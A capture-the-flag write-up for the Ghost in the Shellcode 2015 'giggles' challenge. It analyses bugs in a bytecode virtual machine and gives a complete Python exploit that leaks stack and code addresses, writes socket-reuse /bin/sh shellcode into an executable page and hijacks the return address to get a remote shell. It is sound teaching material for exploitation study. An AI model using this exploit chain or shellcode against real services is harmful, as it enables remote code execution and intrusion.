giggles Ghost in the Shellcode 2015

This was a 300 point pwnable for which we are given the giggles binary
(Linux ELF-64), the source for the server (giggles.c) and a client to 
interact with the binary (client.py).

Other than some stack layout specifics, the source tells us everything
we need to know to exploit the server.

giggles is a virtual machine that supports 7 byte codes:

#define OP_ADD 0
#define OP_BR 1
#define OP_BEQ 2
#define OP_BGT 3
#define OP_MOV 4
#define OP_OUT 5
#define OP_EXIT 6

BASIC OPERATION

On initial connect, a global pointer named JIT is assigned the address of a
page of executable memory so ROP may not be necessary if we can get our
shellcode loaded into this page and transfer to it.

The main loop supports 3 type of operations:
  0. Upload a bytecode function (up to 4096 bytes). A function may contain
     a maximum of 30 bytecode operations, is initially marked as unverified
     and gets copied into the next available slot in the global funcs array
     which is dimensioned to hold 64 function structures and which can
     be overflowed, perhaps in an exploitable manner, but not explored for
     this exploit.
  1. Perform bytecode verification on an existing function
  2. Run an existing function, which must have been successfully verified
  
EXECUTION DESCRIBED ALONG WITH THE BUG WE USE

When a function gets executed, it gets its own set of 10 registers that are
initially zeroed. An array of arguments is also passed into the function. The
number of arguments taken by the function is specified as part of the function
object. A maximum of 10 arguments are allowed and the arguments are copied 
into registers beginning with R[0] prior to executing any bytecode. A program
counter is maintained and initialized to zero. The execute function will 
execute a maximum of 100 operations. Keep in mind that a function object may
contain a maximum of 30 bytecode operations. We will take advantage of the 
fact that no bounds checking is performed on the program counter for sequential
operations. As a result, the program counter can run off the end of one function's
bytecode array and into the following function. Thus, once we get to bytecode[30]
we are fetching from memory occupied by the next function. All we need to do
is craft that function so that its header fields, and eventually the bytecode
array, form a valid continuation of the previous function's bytecode array.

BYTECODE OPERATIONS DESCRIBED

In order to craft a useful function, its necessary to understand a little
bout the bytecode verifier and the checks performed when a new function is
added. The simplistic nature of the instruction set  makes the bytecode 
verifiers job pretty simple. A summary of the byte code follows:
   ADD - add one register to another
   MOV - move one register to another
   BR - set the program counter to the immediate operand
   BEQ - compare two registers and branch to the immediate operand if equal
   BGT - compare two registers and branch to the immediate operand if greater
         than
   OUT - output the contents of a register using a %x format

THE BYTECODE VERIFIER

The bytecode verifier performs the following checks:
   ADD/MOV - fail if either register number is > 10
   OUT - fail if the named register is > 10
   BR - fail if the target is > the function's declared number of instructions
   BEQ/BGT - fail if the named registers are > 10, fail if the target is 
             > the function's declared number of instructions

STACK FRAME OF executeFunction

-0000000000000094 num_args        dd ?
-0000000000000090 args            dq ?                    ; offset
-0000000000000088 f               dq ?                    ; offset
-0000000000000080 i               dd ?
-000000000000007C reg_pc          dd ?
-0000000000000078 instr_count     dd ?
-0000000000000074 done            dd ?
-0000000000000070 result          dq ?                    ; offset
-0000000000000068 curr_op         dq ?                    ; offset
-0000000000000060 registers       dd 10 dup(?)
...
-0000000000000030 buf             db 10 dup(?)    ; buffer for OUT
...
-0000000000000018 canary          dq ?
...
+0000000000000000  s              db 8 dup(?)     ; saved rbp
+0000000000000008  r              db 8 dup(?)     ; return to handleConnection


ADDITIONAL BUGS
             
Two problems present themselves, first, due to the strictly greater than checks,
the virtual machine effectively has 11 registers, 0-10. The manner in which the
registers are allocated in executeFunction is shown below. The 11th register
does not present an opportunity to overwrite anything interesting, but it does
present a potential leak via OUT as it is not zeroed on entry to executeFunction,
only registers 0-9 are zeroed.

The second problem is that jump targets are also checked with a strictly greater
than check allowing jumps to bytecode[num_ops], an off by one error. This is
only practical when we upload a function containing 30 instructions which
positions the last instruction in the bytecode array adjacent to the next
function that gets loaded. Jumping to bytecode[30] in this case, treats the
first bytes of the subsequent function as a bytecode which gives us essentially
the same bug described above where we simply execute off the end of the bytecode
array because there are no bounds checks on the program counter during execution.

CRAFTING OUR PAYLOAD

Our approach is to upload a 30 instruction function and verify it. We the upload
a second function that we will not verify, the last instruction in the first
function is adjacent to the header of the second function. Finally we execute the 
first function and allow execution to run off the end of the function into the
second function. In order for this to work, we need the header of the second
function to both describe a valid function and double as a valid instruction.

The relevant data structures are shown here (both are packed):

struct operation {        struct function {                      
 uint16_t opcode;             uint16_t num_ops;                  
 uint64_t operand1;           uint16_t num_args;                 
 uint64_t operand2;           uint8_t verified;                  
 uint64_t operand3;           struct operation bytecode[MAX_OPS]; //starts at offset 5
}; //26 bytes             };                                     

So we see that the num_ops field in the function header will become the opcode
field when viewed as a bytecode, this restricts us to the range 0-6, but 6 is
EXIT so effectively 0-5. Since this value also dictates the size of the uploaded
function we attempt to use the largest value possible which is 5 / OUT. We then
need 3 64-bit operands that are both valid for out and keep the function valid.
Fortunately, no other fields within the function body are checked when the 
function is uploaded. The only side effect is that the verified field will be 
set to zero. Keeping in mind that we do not need to verify the second function,
we can output a wide range of registers with this first instruction. Registers
are 32-bits so if we want to leak 64-bits we need two OUT operations of
adjacent registers.

The first fake instruction extends 21 bytes into the bytecode array of the second
function. The add function checks verify that we send the proper amount of information
so we need to send exactly 5(sizeof(function header)) + 5*sizeof(operation) = 135 bytes.
Less the 26 bytes dedicated to the first fake instruction we have 109 bytes remaining.
This allows us to send 4 additional instructions (104 bytes) and 5 bytes of padding.
We'll use the first 2 of the 5 padding bytes to hole the EXIT opcode to allow our
function to terminate properly. With the remaining 4 instructions we can get creative
as the operand values in those instructions need never get verified.

With this in mind we proceed as follows:
   1. Create and upload a 30 instruction / 4 argument function (function 0)
   2. Upload a 5 instruction to read registers 24/25(saved rbp) and
      registers 26/27 (saved rip) to leak stack and executable addresses (function 1)
   3. Execute function 0 to leak desired registers.
   4. Derive stack address of registers array from leaked rbp (rbp - 0x58 - 0x68)
   5. Derive address of saved JIT pointer from leaked rip (rip - 0x1EFD + 0x20F5C0)
   6. Compute "register number" of saved JIT pointer to leak address of mapped executable
      page (&jitptr - &registers) / 4
   7. Upload another copy of function 0 as function 2.
   8. Upload a new function to leak the contents of the JIT pointer.
   9. Execute function 2 to leak the JIT pointer.
   10. Compute the "register number" for the JIT page.
   11. Choose our payload (dup sock / shell) and pad to a multiple of 16 bytes
   12. For each 16 byte chunk, split into 4, 4-byte values to use as operands to 
       MOV instructions. Upload a copy of function 0 as function 4, 6, 8, ...
       Upload a fake instruction block with 4 MOVs to move our payload data
       into the jit page as function 5, 7, 9, ...
       Execute functions 4, 6, 8, ... until out entire payload resides on the JIT page
   13. Upload a copy of function 0
   14. Upload a fake instruction block to move the address of the JIT block into
       registers 26/27 (saved rip). This causes executeFunction to return into the JIT
       page.
   15. Profit.
   
Exploit code (highly modified client.py) follows:
----------------------------------------------------------------------------------
#!/usr/bin/python

import socket
import struct
import sys
import os

TYPE_ADDFUNC = 0
TYPE_VERIFY = 1
TYPE_RUNFUNC = 2

OP_ADD = 0
OP_BR = 1
OP_BEQ = 2
OP_BGT = 3
OP_MOV = 4
OP_OUT = 5
OP_EXIT = 6

def createOperation(op, opnd1, opnd2, opnd3):
    operation = struct.pack("H", op)
    operation += struct.pack("Q", opnd1)
    operation += struct.pack("Q", opnd2)
    operation += struct.pack("Q", opnd3)
    return operation

def createFunction(num_ops, num_args, bytecode):
    function = struct.pack("H", num_ops)
    function += struct.pack("H", num_args)
    function += struct.pack("B", 0)
    function += bytecode
    return function

def addFunction(sockfd, function):
    packet = struct.pack("B", TYPE_ADDFUNC)
    packet += struct.pack("H", len(function))
    packet += function
    sockfd.send(packet)
    sockfd.recv(2)
    if (struct.unpack("I", sockfd.recv(4))[0] != 0):
        print "add error"
        sys.exit(0);

def verifyFunction(sockfd, idx):
    packet = struct.pack("B", TYPE_VERIFY)
    packet += struct.pack("H", 2)
    packet += struct.pack("H", idx)
    sockfd.send(packet)
    sockfd.recv(2)
    if (struct.unpack("I", sockfd.recv(4))[0] != 0):
        print "verify error"
        sys.exit(0);

def runFunction(sockfd, idx, args, wait = True):
    packet = struct.pack("B", TYPE_RUNFUNC)
    packet += struct.pack("H", 4 + 4 * len(args))

    packet += struct.pack("H", idx)
    packet += struct.pack("H", len(args))
    for arg in args:
        packet += struct.pack("I", arg)

    sockfd.send(packet)
    if wait:
        outlen = struct.unpack("H", sockfd.recv(2))[0]
        if (outlen != 0):
           return sockfd.recv(outlen)
    return ""
    

sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((sys.argv[1], int(sys.argv[2])))

#do nothing function that executes 30 instructions to run off end
#we use the arguments later for out write operations
operations = createOperation(OP_MOV, 0, 0, 0)*30
fillfunction = createFunction(30, 4, operations)

addFunction(sockfd, fillfunction)

verifyFunction(sockfd, 0)

#first function runs into this fake function
#which is basically union (function f; operation op[]}
#opcode is interpreted as num_ops so limits our size
#since we need a valid opcode
#need to round size up to a valid 5 op function size 
#so we append the exit opcode to terminate the function
#no need to verify this function so we can index outside the
#register array!
operations = createOperation(OP_OUT, 0, 0, 0)
operations += createOperation(OP_OUT, 25, 0, 0)   #index of saved rbp
operations += createOperation(OP_OUT, 24, 0, 0)
operations += createOperation(OP_OUT, 27, 0, 0)   #index of saved rip
operations += createOperation(OP_OUT, 26, 0, 0)
operations += "\x06\x00\x00\x00\x00"

addFunction(sockfd, operations)

addFunction(sockfd, fillfunction)
verifyFunction(sockfd, 2)

leak = runFunction(sockfd, 0, [0, 0, 0, 0])

print leak

rbp = 0
for i in leak.split()[1:3]:
   rbp = (rbp << 32) + int(i, 16)
   
rip = 0
for i in leak.split()[3:]:
   rip = (rip << 32) + int(i, 16)

print "0x%x, 0x%x" % (rbp, rip)

binbase = rip - 0x1EFD
jitptr = binbase + 0x20F5C0
registers = rbp - 0x58 - 0x68

delta = jitptr - registers
lowjit = delta / 4
highjit = lowjit + 1

#with binary base address in hand leak the JIT pointer to the executable page
operations = createOperation(OP_BGT, 0, 0, 0)
operations += createOperation(OP_OUT, highjit & 0xffffffffffffffff, 0, 0)
operations += createOperation(OP_OUT, lowjit & 0xffffffffffffffff, 0, 0)
operations += "\x06\x00\x00\x00\x00"

addFunction(sockfd, operations)

leak = runFunction(sockfd, 2, [0, 0, 0, 0])

print leak

jit = 0
for i in leak.split():
   jit = (jit << 32) + int(i, 16)
   
print "0x%x" % (jit)

payload = "\x6a\x04\x5f\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x79\xf6"
payload += "\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x50"
payload += "\x48\x89\xe2\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

newlen = (len(payload) + 15) & ~15
payload = (payload + "A"*15)[:newlen]

print len(payload)

currfunc = 4

jitidx = ((jit - registers) / 4) & 0xffffffffffffffff

for i in range(0, len(payload), 16):
   addFunction(sockfd, fillfunction)
   
   verifyFunction(sockfd, currfunc)

#use an OP_MOV based stub to write our payload into JIT block    
   operations = createOperation(OP_OUT, 0, 0, 0)
   operations += createOperation(OP_MOV, jitidx, 0, 0)
   operations += createOperation(OP_MOV, jitidx+1, 1, 0)
   operations += createOperation(OP_MOV, jitidx+2, 2, 0)
   operations += createOperation(OP_MOV, jitidx+3, 3, 0)
   operations += "\x06\x00\x00\x00\x00"
   
   jitidx += 4
   
   addFunction(sockfd, operations)
   
   vals = struct.unpack("<4I", payload[i:i+16]) 
   
   runFunction(sockfd, currfunc, vals)
   currfunc += 2


addFunction(sockfd, fillfunction)

verifyFunction(sockfd, currfunc)

#overwrite save return address in executeFunction to return to JIT buffer
operations = createOperation(OP_BGT, 0, 0, 0)
operations += createOperation(OP_MOV, 26, 0, 0)
operations += createOperation(OP_MOV, 27, 1, 0)
operations += "\x06\x00\x00\x00\x00"

addFunction(sockfd, operations)

#run our function to overwrite return address
runFunction(sockfd, currfunc, [jit & 0xffffffff, jit >> 32, 0, 0], False)

#talk to shell :)
if os.fork():
   while 1:
      b = sockfd.recv(1)
      sys.stderr.write(b)
else:
   while 1:
      b = sys.stdin.read(1)
      sockfd.sendall(b)